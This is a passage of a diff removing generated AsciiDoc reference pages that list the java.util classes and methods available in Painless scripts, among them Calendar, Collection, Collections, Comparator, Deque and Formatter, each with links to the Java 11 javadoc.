{java11-javadoc}/java.base/java/util/Calendar.html#setLenient(boolean)[setLenient](boolean) -* void {java11-javadoc}/java.base/java/util/Calendar.html#setMinimalDaysInFirstWeek(int)[setMinimalDaysInFirstWeek](int) -* void {java11-javadoc}/java.base/java/util/Calendar.html#setTime(java.util.Date)[setTime](Date) -* void {java11-javadoc}/java.base/java/util/Calendar.html#setTimeInMillis(long)[setTimeInMillis](long) -* void {java11-javadoc}/java.base/java/util/Calendar.html#setTimeZone(java.util.TimeZone)[setTimeZone](TimeZone) -* void {java11-javadoc}/java.base/java/util/Calendar.html#setWeekDate(int,int,int)[setWeekDate](int, int, int) -* Instant {java11-javadoc}/java.base/java/util/Calendar.html#toInstant()[toInstant]() -* null {java11-javadoc}/java.base/java/lang/Object.html#toString()[toString]() - - -[[painless-api-reference-shared-Calendar-Builder]] -==== Calendar.Builder -* {java11-javadoc}/java.base/java/util/Calendar$Builder.html#()[Calendar.Builder]() -* Calendar {java11-javadoc}/java.base/java/util/Calendar$Builder.html#build()[build]() -* boolean {java11-javadoc}/java.base/java/lang/Object.html#equals(java.lang.Object)[equals](Object) -* int {java11-javadoc}/java.base/java/lang/Object.html#hashCode()[hashCode]() -* Calendar.Builder {java11-javadoc}/java.base/java/util/Calendar$Builder.html#set(int,int)[set](int, int) -* Calendar.Builder {java11-javadoc}/java.base/java/util/Calendar$Builder.html#setCalendarType(java.lang.String)[setCalendarType](null) -* Calendar.Builder {java11-javadoc}/java.base/java/util/Calendar$Builder.html#setDate(int,int,int)[setDate](int, int, int) -* Calendar.Builder {java11-javadoc}/java.base/java/util/Calendar$Builder.html#setFields(int%5B%5D)[setFields](int[]) -* Calendar.Builder {java11-javadoc}/java.base/java/util/Calendar$Builder.html#setInstant(long)[setInstant](long) -* Calendar.Builder {java11-javadoc}/java.base/java/util/Calendar$Builder.html#setLenient(boolean)[setLenient](boolean) -* Calendar.Builder {java11-javadoc}/java.base/java/util/Calendar$Builder.html#setLocale(java.util.Locale)[setLocale](Locale) -* Calendar.Builder {java11-javadoc}/java.base/java/util/Calendar$Builder.html#setTimeOfDay(int,int,int)[setTimeOfDay](int, int, int) -* Calendar.Builder {java11-javadoc}/java.base/java/util/Calendar$Builder.html#setTimeOfDay(int,int,int,int)[setTimeOfDay](int, int, int, int) -* Calendar.Builder {java11-javadoc}/java.base/java/util/Calendar$Builder.html#setTimeZone(java.util.TimeZone)[setTimeZone](TimeZone) -* Calendar.Builder {java11-javadoc}/java.base/java/util/Calendar$Builder.html#setWeekDate(int,int,int)[setWeekDate](int, int, int) -* Calendar.Builder {java11-javadoc}/java.base/java/util/Calendar$Builder.html#setWeekDefinition(int,int)[setWeekDefinition](int, int) -* null {java11-javadoc}/java.base/java/lang/Object.html#toString()[toString]() - - -[[painless-api-reference-shared-Collection]] -==== Collection -* boolean {java11-javadoc}/java.base/java/util/Collection.html#add(java.lang.Object)[add](def) -* boolean {java11-javadoc}/java.base/java/util/Collection.html#addAll(java.util.Collection)[addAll](Collection) -* boolean any(Predicate) -* Collection asCollection() -* List asList() -* void {java11-javadoc}/java.base/java/util/Collection.html#clear()[clear]() -* List collect(Function) -* def collect(Collection, Function) -* boolean {java11-javadoc}/java.base/java/util/Collection.html#contains(java.lang.Object)[contains](def) -* boolean {java11-javadoc}/java.base/java/util/Collection.html#containsAll(java.util.Collection)[containsAll](Collection) -* def each(Consumer) -* def eachWithIndex(ObjIntConsumer) -* boolean {java11-javadoc}/java.base/java/lang/Object.html#equals(java.lang.Object)[equals](Object) -* boolean every(Predicate) -* def find(Predicate) -* List findAll(Predicate) -* def findResult(Function) -* def findResult(def, Function) -* List findResults(Function) -* void {java11-javadoc}/java.base/java/lang/Iterable.html#forEach(java.util.function.Consumer)[forEach](Consumer) -* Map groupBy(Function) -* int {java11-javadoc}/java.base/java/lang/Object.html#hashCode()[hashCode]() -* boolean {java11-javadoc}/java.base/java/util/Collection.html#isEmpty()[isEmpty]() -* Iterator {java11-javadoc}/java.base/java/lang/Iterable.html#iterator()[iterator]() -* null join(null) -* boolean {java11-javadoc}/java.base/java/util/Collection.html#removeAll(java.util.Collection)[removeAll](Collection) -* boolean {java11-javadoc}/java.base/java/util/Collection.html#removeIf(java.util.function.Predicate)[removeIf](Predicate) -* boolean {java11-javadoc}/java.base/java/util/Collection.html#retainAll(java.util.Collection)[retainAll](Collection) -* int {java11-javadoc}/java.base/java/util/Collection.html#size()[size]() -* List split(Predicate) -* Spliterator {java11-javadoc}/java.base/java/util/Collection.html#spliterator()[spliterator]() -* Stream {java11-javadoc}/java.base/java/util/Collection.html#stream()[stream]() -* double sum() -* double sum(ToDoubleFunction) -* def[] {java11-javadoc}/java.base/java/util/Collection.html#toArray()[toArray]() -* def[] {java11-javadoc}/java.base/java/util/Collection.html#toArray(java.lang.Object%5B%5D)[toArray](def[]) -* null {java11-javadoc}/java.base/java/lang/Object.html#toString()[toString]() - - -[[painless-api-reference-shared-Collections]] -==== Collections -* static List {java11-javadoc}/java.base/java/util/Collections.html#EMPTY_LIST[EMPTY_LIST] -* static Map {java11-javadoc}/java.base/java/util/Collections.html#EMPTY_MAP[EMPTY_MAP] -* static Set {java11-javadoc}/java.base/java/util/Collections.html#EMPTY_SET[EMPTY_SET] -* static boolean {java11-javadoc}/java.base/java/util/Collections.html#addAll(java.util.Collection,java.lang.Object%5B%5D)[addAll](Collection, def[]) -* static Queue {java11-javadoc}/java.base/java/util/Collections.html#asLifoQueue(java.util.Deque)[asLifoQueue](Deque) -* static int {java11-javadoc}/java.base/java/util/Collections.html#binarySearch(java.util.List,java.lang.Object)[binarySearch](List, def) -* static int {java11-javadoc}/java.base/java/util/Collections.html#binarySearch(java.util.List,java.lang.Object,java.util.Comparator)[binarySearch](List, def, Comparator) -* static void {java11-javadoc}/java.base/java/util/Collections.html#copy(java.util.List,java.util.List)[copy](List, List) -* static boolean {java11-javadoc}/java.base/java/util/Collections.html#disjoint(java.util.Collection,java.util.Collection)[disjoint](Collection, Collection) -* static Enumeration {java11-javadoc}/java.base/java/util/Collections.html#emptyEnumeration()[emptyEnumeration]() -* static Iterator {java11-javadoc}/java.base/java/util/Collections.html#emptyIterator()[emptyIterator]() -* static List {java11-javadoc}/java.base/java/util/Collections.html#emptyList()[emptyList]() -* static ListIterator {java11-javadoc}/java.base/java/util/Collections.html#emptyListIterator()[emptyListIterator]() -* static Map {java11-javadoc}/java.base/java/util/Collections.html#emptyMap()[emptyMap]() -* static NavigableMap {java11-javadoc}/java.base/java/util/Collections.html#emptyNavigableMap()[emptyNavigableMap]() -* static NavigableSet {java11-javadoc}/java.base/java/util/Collections.html#emptyNavigableSet()[emptyNavigableSet]() -* static Set {java11-javadoc}/java.base/java/util/Collections.html#emptySet()[emptySet]() -* static SortedMap {java11-javadoc}/java.base/java/util/Collections.html#emptySortedMap()[emptySortedMap]() -* static SortedSet {java11-javadoc}/java.base/java/util/Collections.html#emptySortedSet()[emptySortedSet]() -* static Enumeration {java11-javadoc}/java.base/java/util/Collections.html#enumeration(java.util.Collection)[enumeration](Collection) -* static void {java11-javadoc}/java.base/java/util/Collections.html#fill(java.util.List,java.lang.Object)[fill](List, def) -* static int {java11-javadoc}/java.base/java/util/Collections.html#frequency(java.util.Collection,java.lang.Object)[frequency](Collection, def) -* static int {java11-javadoc}/java.base/java/util/Collections.html#indexOfSubList(java.util.List,java.util.List)[indexOfSubList](List, List) -* static int {java11-javadoc}/java.base/java/util/Collections.html#lastIndexOfSubList(java.util.List,java.util.List)[lastIndexOfSubList](List, List) -* static ArrayList {java11-javadoc}/java.base/java/util/Collections.html#list(java.util.Enumeration)[list](Enumeration) -* static def {java11-javadoc}/java.base/java/util/Collections.html#max(java.util.Collection)[max](Collection) -* static def {java11-javadoc}/java.base/java/util/Collections.html#max(java.util.Collection,java.util.Comparator)[max](Collection, Comparator) -* static def {java11-javadoc}/java.base/java/util/Collections.html#min(java.util.Collection)[min](Collection) -* static def {java11-javadoc}/java.base/java/util/Collections.html#min(java.util.Collection,java.util.Comparator)[min](Collection, Comparator) -* static List {java11-javadoc}/java.base/java/util/Collections.html#nCopies(int,java.lang.Object)[nCopies](int, def) -* static Set {java11-javadoc}/java.base/java/util/Collections.html#newSetFromMap(java.util.Map)[newSetFromMap](Map) -* static boolean {java11-javadoc}/java.base/java/util/Collections.html#replaceAll(java.util.List,java.lang.Object,java.lang.Object)[replaceAll](List, def, def) -* static void {java11-javadoc}/java.base/java/util/Collections.html#reverse(java.util.List)[reverse](List) -* static Comparator {java11-javadoc}/java.base/java/util/Collections.html#reverseOrder()[reverseOrder]() -* static Comparator {java11-javadoc}/java.base/java/util/Collections.html#reverseOrder(java.util.Comparator)[reverseOrder](Comparator) -* static void {java11-javadoc}/java.base/java/util/Collections.html#rotate(java.util.List,int)[rotate](List, int) -* static void {java11-javadoc}/java.base/java/util/Collections.html#shuffle(java.util.List)[shuffle](List) -* static void {java11-javadoc}/java.base/java/util/Collections.html#shuffle(java.util.List,java.util.Random)[shuffle](List, Random) -* static Set {java11-javadoc}/java.base/java/util/Collections.html#singleton(java.lang.Object)[singleton](def) -* static List {java11-javadoc}/java.base/java/util/Collections.html#singletonList(java.lang.Object)[singletonList](def) -* static Map {java11-javadoc}/java.base/java/util/Collections.html#singletonMap(java.lang.Object,java.lang.Object)[singletonMap](def, def) -* static void {java11-javadoc}/java.base/java/util/Collections.html#sort(java.util.List)[sort](List) -* static void {java11-javadoc}/java.base/java/util/Collections.html#sort(java.util.List,java.util.Comparator)[sort](List, Comparator) -* static void {java11-javadoc}/java.base/java/util/Collections.html#swap(java.util.List,int,int)[swap](List, int, int) -* static Collection {java11-javadoc}/java.base/java/util/Collections.html#unmodifiableCollection(java.util.Collection)[unmodifiableCollection](Collection) -* static List {java11-javadoc}/java.base/java/util/Collections.html#unmodifiableList(java.util.List)[unmodifiableList](List) -* static Map {java11-javadoc}/java.base/java/util/Collections.html#unmodifiableMap(java.util.Map)[unmodifiableMap](Map) -* static NavigableMap {java11-javadoc}/java.base/java/util/Collections.html#unmodifiableNavigableMap(java.util.NavigableMap)[unmodifiableNavigableMap](NavigableMap) -* static NavigableSet {java11-javadoc}/java.base/java/util/Collections.html#unmodifiableNavigableSet(java.util.NavigableSet)[unmodifiableNavigableSet](NavigableSet) -* static Set {java11-javadoc}/java.base/java/util/Collections.html#unmodifiableSet(java.util.Set)[unmodifiableSet](Set) -* static SortedMap {java11-javadoc}/java.base/java/util/Collections.html#unmodifiableSortedMap(java.util.SortedMap)[unmodifiableSortedMap](SortedMap) -* static SortedSet {java11-javadoc}/java.base/java/util/Collections.html#unmodifiableSortedSet(java.util.SortedSet)[unmodifiableSortedSet](SortedSet) -* boolean {java11-javadoc}/java.base/java/lang/Object.html#equals(java.lang.Object)[equals](Object) -* int {java11-javadoc}/java.base/java/lang/Object.html#hashCode()[hashCode]() -* null {java11-javadoc}/java.base/java/lang/Object.html#toString()[toString]() - - -[[painless-api-reference-shared-Comparator]] -==== Comparator -* static Comparator {java11-javadoc}/java.base/java/util/Comparator.html#comparing(java.util.function.Function)[comparing](Function) -* static Comparator {java11-javadoc}/java.base/java/util/Comparator.html#comparing(java.util.function.Function,java.util.Comparator)[comparing](Function, Comparator) -* static Comparator {java11-javadoc}/java.base/java/util/Comparator.html#comparingDouble(java.util.function.ToDoubleFunction)[comparingDouble](ToDoubleFunction) -* static Comparator {java11-javadoc}/java.base/java/util/Comparator.html#comparingInt(java.util.function.ToIntFunction)[comparingInt](ToIntFunction) -* static Comparator {java11-javadoc}/java.base/java/util/Comparator.html#comparingLong(java.util.function.ToLongFunction)[comparingLong](ToLongFunction) -* static Comparator {java11-javadoc}/java.base/java/util/Comparator.html#naturalOrder()[naturalOrder]() -* static Comparator {java11-javadoc}/java.base/java/util/Comparator.html#nullsFirst(java.util.Comparator)[nullsFirst](Comparator) -* static Comparator {java11-javadoc}/java.base/java/util/Comparator.html#nullsLast(java.util.Comparator)[nullsLast](Comparator) -* static Comparator {java11-javadoc}/java.base/java/util/Comparator.html#reverseOrder()[reverseOrder]() -* int {java11-javadoc}/java.base/java/util/Comparator.html#compare(java.lang.Object,java.lang.Object)[compare](def, def) -* boolean {java11-javadoc}/java.base/java/util/Comparator.html#equals(java.lang.Object)[equals](Object) -* int {java11-javadoc}/java.base/java/lang/Object.html#hashCode()[hashCode]() -* Comparator {java11-javadoc}/java.base/java/util/Comparator.html#reversed()[reversed]() -* Comparator {java11-javadoc}/java.base/java/util/Comparator.html#thenComparing(java.util.Comparator)[thenComparing](Comparator) -* Comparator {java11-javadoc}/java.base/java/util/Comparator.html#thenComparing(java.util.function.Function,java.util.Comparator)[thenComparing](Function, Comparator) -* Comparator {java11-javadoc}/java.base/java/util/Comparator.html#thenComparingDouble(java.util.function.ToDoubleFunction)[thenComparingDouble](ToDoubleFunction) -* Comparator {java11-javadoc}/java.base/java/util/Comparator.html#thenComparingInt(java.util.function.ToIntFunction)[thenComparingInt](ToIntFunction) -* Comparator {java11-javadoc}/java.base/java/util/Comparator.html#thenComparingLong(java.util.function.ToLongFunction)[thenComparingLong](ToLongFunction) -* null {java11-javadoc}/java.base/java/lang/Object.html#toString()[toString]() - - -[[painless-api-reference-shared-ConcurrentModificationException]] -==== ConcurrentModificationException -* {java11-javadoc}/java.base/java/util/ConcurrentModificationException.html#()[ConcurrentModificationException]() -* {java11-javadoc}/java.base/java/util/ConcurrentModificationException.html#(java.lang.String)[ConcurrentModificationException](null) -* boolean {java11-javadoc}/java.base/java/lang/Object.html#equals(java.lang.Object)[equals](Object) -* null {java11-javadoc}/java.base/java/lang/Throwable.html#getLocalizedMessage()[getLocalizedMessage]() -* null {java11-javadoc}/java.base/java/lang/Throwable.html#getMessage()[getMessage]() -* StackTraceElement[] {java11-javadoc}/java.base/java/lang/Throwable.html#getStackTrace()[getStackTrace]() -* int {java11-javadoc}/java.base/java/lang/Object.html#hashCode()[hashCode]() -* null {java11-javadoc}/java.base/java/lang/Object.html#toString()[toString]() - - -[[painless-api-reference-shared-Currency]] -==== Currency -* static Set {java11-javadoc}/java.base/java/util/Currency.html#getAvailableCurrencies()[getAvailableCurrencies]() -* static Currency {java11-javadoc}/java.base/java/util/Currency.html#getInstance(java.lang.String)[getInstance](null) -* boolean {java11-javadoc}/java.base/java/lang/Object.html#equals(java.lang.Object)[equals](Object) -* null {java11-javadoc}/java.base/java/util/Currency.html#getCurrencyCode()[getCurrencyCode]() -* int {java11-javadoc}/java.base/java/util/Currency.html#getDefaultFractionDigits()[getDefaultFractionDigits]() -* null {java11-javadoc}/java.base/java/util/Currency.html#getDisplayName()[getDisplayName]() -* null {java11-javadoc}/java.base/java/util/Currency.html#getDisplayName(java.util.Locale)[getDisplayName](Locale) -* int {java11-javadoc}/java.base/java/util/Currency.html#getNumericCode()[getNumericCode]() -* null {java11-javadoc}/java.base/java/util/Currency.html#getSymbol()[getSymbol]() -* null {java11-javadoc}/java.base/java/util/Currency.html#getSymbol(java.util.Locale)[getSymbol](Locale) -* int {java11-javadoc}/java.base/java/lang/Object.html#hashCode()[hashCode]() -* null {java11-javadoc}/java.base/java/lang/Object.html#toString()[toString]() - - -[[painless-api-reference-shared-Date]] -==== Date -* static Date {java11-javadoc}/java.base/java/util/Date.html#from(java.time.Instant)[from](Instant) -* {java11-javadoc}/java.base/java/util/Date.html#()[Date]() -* {java11-javadoc}/java.base/java/util/Date.html#(long)[Date](long) -* boolean {java11-javadoc}/java.base/java/util/Date.html#after(java.util.Date)[after](Date) -* boolean {java11-javadoc}/java.base/java/util/Date.html#before(java.util.Date)[before](Date) -* def {java11-javadoc}/java.base/java/util/Date.html#clone()[clone]() -* int {java11-javadoc}/java.base/java/util/Date.html#compareTo(java.util.Date)[compareTo](Date) -* boolean {java11-javadoc}/java.base/java/lang/Object.html#equals(java.lang.Object)[equals](Object) -* long {java11-javadoc}/java.base/java/util/Date.html#getTime()[getTime]() -* int {java11-javadoc}/java.base/java/lang/Object.html#hashCode()[hashCode]() -* void {java11-javadoc}/java.base/java/util/Date.html#setTime(long)[setTime](long) -* null {java11-javadoc}/java.base/java/lang/Object.html#toString()[toString]() - - -[[painless-api-reference-shared-Deque]] -==== Deque -* boolean {java11-javadoc}/java.base/java/util/Collection.html#add(java.lang.Object)[add](def) -* boolean {java11-javadoc}/java.base/java/util/Collection.html#addAll(java.util.Collection)[addAll](Collection) -* void {java11-javadoc}/java.base/java/util/Deque.html#addFirst(java.lang.Object)[addFirst](def) -* void {java11-javadoc}/java.base/java/util/Deque.html#addLast(java.lang.Object)[addLast](def) -* boolean any(Predicate) -* Collection asCollection() -* List asList() -* void {java11-javadoc}/java.base/java/util/Collection.html#clear()[clear]() -* List collect(Function) -* def collect(Collection, Function) -* boolean {java11-javadoc}/java.base/java/util/Collection.html#contains(java.lang.Object)[contains](def) -* boolean {java11-javadoc}/java.base/java/util/Collection.html#containsAll(java.util.Collection)[containsAll](Collection) -* Iterator {java11-javadoc}/java.base/java/util/Deque.html#descendingIterator()[descendingIterator]() -* def each(Consumer) -* def eachWithIndex(ObjIntConsumer) -* def {java11-javadoc}/java.base/java/util/Queue.html#element()[element]() -* boolean {java11-javadoc}/java.base/java/lang/Object.html#equals(java.lang.Object)[equals](Object) -* boolean every(Predicate) -* def find(Predicate) -* List findAll(Predicate) -* def findResult(Function) -* def findResult(def, Function) -* List findResults(Function) -* void {java11-javadoc}/java.base/java/lang/Iterable.html#forEach(java.util.function.Consumer)[forEach](Consumer) -* def {java11-javadoc}/java.base/java/util/Deque.html#getFirst()[getFirst]() -* def {java11-javadoc}/java.base/java/util/Deque.html#getLast()[getLast]() -* Map groupBy(Function) -* int {java11-javadoc}/java.base/java/lang/Object.html#hashCode()[hashCode]() -* boolean {java11-javadoc}/java.base/java/util/Collection.html#isEmpty()[isEmpty]() -* Iterator {java11-javadoc}/java.base/java/lang/Iterable.html#iterator()[iterator]() -* null join(null) -* boolean {java11-javadoc}/java.base/java/util/Queue.html#offer(java.lang.Object)[offer](def) -* boolean {java11-javadoc}/java.base/java/util/Deque.html#offerFirst(java.lang.Object)[offerFirst](def) -* boolean {java11-javadoc}/java.base/java/util/Deque.html#offerLast(java.lang.Object)[offerLast](def) -* def {java11-javadoc}/java.base/java/util/Queue.html#peek()[peek]() -* def {java11-javadoc}/java.base/java/util/Deque.html#peekFirst()[peekFirst]() -* def {java11-javadoc}/java.base/java/util/Deque.html#peekLast()[peekLast]() -* def {java11-javadoc}/java.base/java/util/Queue.html#poll()[poll]() -* def {java11-javadoc}/java.base/java/util/Deque.html#pollFirst()[pollFirst]() -* def {java11-javadoc}/java.base/java/util/Deque.html#pollLast()[pollLast]() -* def {java11-javadoc}/java.base/java/util/Deque.html#pop()[pop]() -* void {java11-javadoc}/java.base/java/util/Deque.html#push(java.lang.Object)[push](def) -* def {java11-javadoc}/java.base/java/util/Queue.html#remove()[remove]() -* boolean {java11-javadoc}/java.base/java/util/Deque.html#remove(java.lang.Object)[remove](def) -* boolean {java11-javadoc}/java.base/java/util/Collection.html#removeAll(java.util.Collection)[removeAll](Collection) -* def {java11-javadoc}/java.base/java/util/Deque.html#removeFirst()[removeFirst]() -* boolean {java11-javadoc}/java.base/java/util/Deque.html#removeFirstOccurrence(java.lang.Object)[removeFirstOccurrence](def) -* boolean {java11-javadoc}/java.base/java/util/Collection.html#removeIf(java.util.function.Predicate)[removeIf](Predicate) -* def {java11-javadoc}/java.base/java/util/Deque.html#removeLast()[removeLast]() -* boolean {java11-javadoc}/java.base/java/util/Deque.html#removeLastOccurrence(java.lang.Object)[removeLastOccurrence](def) -* boolean {java11-javadoc}/java.base/java/util/Collection.html#retainAll(java.util.Collection)[retainAll](Collection) -* int {java11-javadoc}/java.base/java/util/Collection.html#size()[size]() -* List split(Predicate) -* Spliterator {java11-javadoc}/java.base/java/util/Collection.html#spliterator()[spliterator]() -* Stream {java11-javadoc}/java.base/java/util/Collection.html#stream()[stream]() -* double sum() -* double sum(ToDoubleFunction) -* def[] {java11-javadoc}/java.base/java/util/Collection.html#toArray()[toArray]() -* def[] {java11-javadoc}/java.base/java/util/Collection.html#toArray(java.lang.Object%5B%5D)[toArray](def[]) -* null {java11-javadoc}/java.base/java/lang/Object.html#toString()[toString]() - - -[[painless-api-reference-shared-Dictionary]] -==== Dictionary -* Enumeration {java11-javadoc}/java.base/java/util/Dictionary.html#elements()[elements]() -* boolean {java11-javadoc}/java.base/java/lang/Object.html#equals(java.lang.Object)[equals](Object) -* def {java11-javadoc}/java.base/java/util/Dictionary.html#get(java.lang.Object)[get](def) -* int {java11-javadoc}/java.base/java/lang/Object.html#hashCode()[hashCode]() -* boolean {java11-javadoc}/java.base/java/util/Dictionary.html#isEmpty()[isEmpty]() -* Enumeration {java11-javadoc}/java.base/java/util/Dictionary.html#keys()[keys]() -* def {java11-javadoc}/java.base/java/util/Dictionary.html#put(java.lang.Object,java.lang.Object)[put](def, def) -* def {java11-javadoc}/java.base/java/util/Dictionary.html#remove(java.lang.Object)[remove](def) -* int {java11-javadoc}/java.base/java/util/Dictionary.html#size()[size]() -* null {java11-javadoc}/java.base/java/lang/Object.html#toString()[toString]() - - -[[painless-api-reference-shared-DoubleSummaryStatistics]] -==== DoubleSummaryStatistics -* {java11-javadoc}/java.base/java/util/DoubleSummaryStatistics.html#()[DoubleSummaryStatistics]() -* void {java11-javadoc}/java.base/java/util/function/DoubleConsumer.html#accept(double)[accept](double) -* DoubleConsumer {java11-javadoc}/java.base/java/util/function/DoubleConsumer.html#andThen(java.util.function.DoubleConsumer)[andThen](DoubleConsumer) -* void {java11-javadoc}/java.base/java/util/DoubleSummaryStatistics.html#combine(java.util.DoubleSummaryStatistics)[combine](DoubleSummaryStatistics) -* boolean {java11-javadoc}/java.base/java/lang/Object.html#equals(java.lang.Object)[equals](Object) -* double {java11-javadoc}/java.base/java/util/DoubleSummaryStatistics.html#getAverage()[getAverage]() -* long {java11-javadoc}/java.base/java/util/DoubleSummaryStatistics.html#getCount()[getCount]() -* double {java11-javadoc}/java.base/java/util/DoubleSummaryStatistics.html#getMax()[getMax]() -* double {java11-javadoc}/java.base/java/util/DoubleSummaryStatistics.html#getMin()[getMin]() -* double {java11-javadoc}/java.base/java/util/DoubleSummaryStatistics.html#getSum()[getSum]() -* int {java11-javadoc}/java.base/java/lang/Object.html#hashCode()[hashCode]() -* null {java11-javadoc}/java.base/java/lang/Object.html#toString()[toString]() - - -[[painless-api-reference-shared-DuplicateFormatFlagsException]] -==== DuplicateFormatFlagsException -* {java11-javadoc}/java.base/java/util/DuplicateFormatFlagsException.html#(java.lang.String)[DuplicateFormatFlagsException](null) -* boolean {java11-javadoc}/java.base/java/lang/Object.html#equals(java.lang.Object)[equals](Object) -* null {java11-javadoc}/java.base/java/util/DuplicateFormatFlagsException.html#getFlags()[getFlags]() -* null {java11-javadoc}/java.base/java/lang/Throwable.html#getLocalizedMessage()[getLocalizedMessage]() -* null {java11-javadoc}/java.base/java/lang/Throwable.html#getMessage()[getMessage]() -* StackTraceElement[] {java11-javadoc}/java.base/java/lang/Throwable.html#getStackTrace()[getStackTrace]() -* int {java11-javadoc}/java.base/java/lang/Object.html#hashCode()[hashCode]() -* null {java11-javadoc}/java.base/java/lang/Object.html#toString()[toString]() - - -[[painless-api-reference-shared-EmptyStackException]] -==== EmptyStackException -* {java11-javadoc}/java.base/java/util/EmptyStackException.html#()[EmptyStackException]() -* boolean {java11-javadoc}/java.base/java/lang/Object.html#equals(java.lang.Object)[equals](Object) -* null {java11-javadoc}/java.base/java/lang/Throwable.html#getLocalizedMessage()[getLocalizedMessage]() -* null {java11-javadoc}/java.base/java/lang/Throwable.html#getMessage()[getMessage]() -* StackTraceElement[] {java11-javadoc}/java.base/java/lang/Throwable.html#getStackTrace()[getStackTrace]() -* int {java11-javadoc}/java.base/java/lang/Object.html#hashCode()[hashCode]() -* null {java11-javadoc}/java.base/java/lang/Object.html#toString()[toString]() - - -[[painless-api-reference-shared-Enumeration]] -==== Enumeration -* boolean {java11-javadoc}/java.base/java/lang/Object.html#equals(java.lang.Object)[equals](Object) -* boolean {java11-javadoc}/java.base/java/util/Enumeration.html#hasMoreElements()[hasMoreElements]() -* int {java11-javadoc}/java.base/java/lang/Object.html#hashCode()[hashCode]() -* def {java11-javadoc}/java.base/java/util/Enumeration.html#nextElement()[nextElement]() -* null {java11-javadoc}/java.base/java/lang/Object.html#toString()[toString]() - - -[[painless-api-reference-shared-EventListener]] -==== EventListener -* boolean {java11-javadoc}/java.base/java/lang/Object.html#equals(java.lang.Object)[equals](Object) -* int {java11-javadoc}/java.base/java/lang/Object.html#hashCode()[hashCode]() -* null {java11-javadoc}/java.base/java/lang/Object.html#toString()[toString]() - - -[[painless-api-reference-shared-EventListenerProxy]] -==== EventListenerProxy -* boolean {java11-javadoc}/java.base/java/lang/Object.html#equals(java.lang.Object)[equals](Object) -* EventListener {java11-javadoc}/java.base/java/util/EventListenerProxy.html#getListener()[getListener]() -* int {java11-javadoc}/java.base/java/lang/Object.html#hashCode()[hashCode]() -* null {java11-javadoc}/java.base/java/lang/Object.html#toString()[toString]() - - -[[painless-api-reference-shared-EventObject]] -==== EventObject -* {java11-javadoc}/java.base/java/util/EventObject.html#(java.lang.Object)[EventObject](Object) -* boolean {java11-javadoc}/java.base/java/lang/Object.html#equals(java.lang.Object)[equals](Object) -* Object {java11-javadoc}/java.base/java/util/EventObject.html#getSource()[getSource]() -* int {java11-javadoc}/java.base/java/lang/Object.html#hashCode()[hashCode]() -* null {java11-javadoc}/java.base/java/lang/Object.html#toString()[toString]() - - -[[painless-api-reference-shared-FormatFlagsConversionMismatchException]] -==== FormatFlagsConversionMismatchException -* {java11-javadoc}/java.base/java/util/FormatFlagsConversionMismatchException.html#(java.lang.String,char)[FormatFlagsConversionMismatchException](null, char) -* boolean {java11-javadoc}/java.base/java/lang/Object.html#equals(java.lang.Object)[equals](Object) -* char {java11-javadoc}/java.base/java/util/FormatFlagsConversionMismatchException.html#getConversion()[getConversion]() -* null {java11-javadoc}/java.base/java/util/FormatFlagsConversionMismatchException.html#getFlags()[getFlags]() -* null {java11-javadoc}/java.base/java/lang/Throwable.html#getLocalizedMessage()[getLocalizedMessage]() -* null {java11-javadoc}/java.base/java/lang/Throwable.html#getMessage()[getMessage]() -* StackTraceElement[] {java11-javadoc}/java.base/java/lang/Throwable.html#getStackTrace()[getStackTrace]() -* int {java11-javadoc}/java.base/java/lang/Object.html#hashCode()[hashCode]() -* null {java11-javadoc}/java.base/java/lang/Object.html#toString()[toString]() - - -[[painless-api-reference-shared-Formattable]] -==== Formattable -* boolean {java11-javadoc}/java.base/java/lang/Object.html#equals(java.lang.Object)[equals](Object) -* void {java11-javadoc}/java.base/java/util/Formattable.html#formatTo(java.util.Formatter,int,int,int)[formatTo](Formatter, int, int, int) -* int {java11-javadoc}/java.base/java/lang/Object.html#hashCode()[hashCode]() -* null {java11-javadoc}/java.base/java/lang/Object.html#toString()[toString]() - - -[[painless-api-reference-shared-FormattableFlags]] -==== FormattableFlags -* static int {java11-javadoc}/java.base/java/util/FormattableFlags.html#ALTERNATE[ALTERNATE] -* static int {java11-javadoc}/java.base/java/util/FormattableFlags.html#LEFT_JUSTIFY[LEFT_JUSTIFY] -* static int {java11-javadoc}/java.base/java/util/FormattableFlags.html#UPPERCASE[UPPERCASE] -* boolean {java11-javadoc}/java.base/java/lang/Object.html#equals(java.lang.Object)[equals](Object) -* int {java11-javadoc}/java.base/java/lang/Object.html#hashCode()[hashCode]() -* null {java11-javadoc}/java.base/java/lang/Object.html#toString()[toString]() - - -[[painless-api-reference-shared-Formatter]] -==== Formatter -* {java11-javadoc}/java.base/java/util/Formatter.html#()[Formatter]() -* {java11-javadoc}/java.base/java/util/Formatter.html#(java.lang.Appendable)[Formatter](Appendable) -* {java11-javadoc}/java.base/java/util/Formatter.html#(java.lang.Appendable,java.util.Locale)[Formatter](Appendable, Locale) -* boolean {java11-javadoc}/java.base/java/lang/Object.html#equals(java.lang.Object)[equals](Object) -* Formatter {java11-javadoc}/java.base/java/util/Formatter.html#format(java.lang.String,java.lang.Object%5B%5D)[format](null, def[]) -* Formatter {java11-javadoc}/java.base/java/util/Formatter.html#format(java.util.Locale,java.lang.String,java.lang.Object%5B%5D)[format](Locale, null, def[]) -* int {java11-javadoc}/java.base/java/lang/Object.html#hashCode()[hashCode]() -* Locale {java11-javadoc}/java.base/java/util/Formatter.html#locale()[locale]() -* Appendable {java11-javadoc}/java.base/java/util/Formatter.html#out()[out]() -* null {java11-javadoc}/java.base/java/lang/Object.html#toString()[toString]() - - -[[painless-api-reference-shared-Formatter-BigDecimalLayoutForm]] -==== Formatter.BigDecimalLayoutForm -* static Formatter.BigDecimalLayoutForm {java11-javadoc}/java.base/java/util/Formatter$BigDecimalLayoutForm.html#DECIMAL_FLOAT[DECIMAL_FLOAT] -* static Formatter.BigDecimalLayoutForm {java11-javadoc}/java.base/java/util/Formatter$BigDecimalLayoutForm.html#SCIENTIFIC[SCIENTIFIC] -* int {java11-javadoc}/java.base/java/lang/Enum.html#compareTo(java.lang.Enum)[compareTo](Enum) -* boolean {java11-javadoc}/java.base/java/lang/Object.html#equals(java.lang.Object)[equals](Object) -* int {java11-javadoc}/java.base/java/lang/Object.html#hashCode()[hashCode]() -* null {java11-javadoc}/java.base/java/lang/Enum.html#name()[name]() -* int {java11-javadoc}/java.base/java/lang/Enum.html#ordinal()[ordinal]() -* null {java11-javadoc}/java.base/java/lang/Object.html#toString()[toString]() - - -[[painless-api-reference-shared-FormatterClosedException]] -==== FormatterClosedException -* {java11-javadoc}/java.base/java/util/FormatterClosedException.html#()[FormatterClosedException]() -* boolean 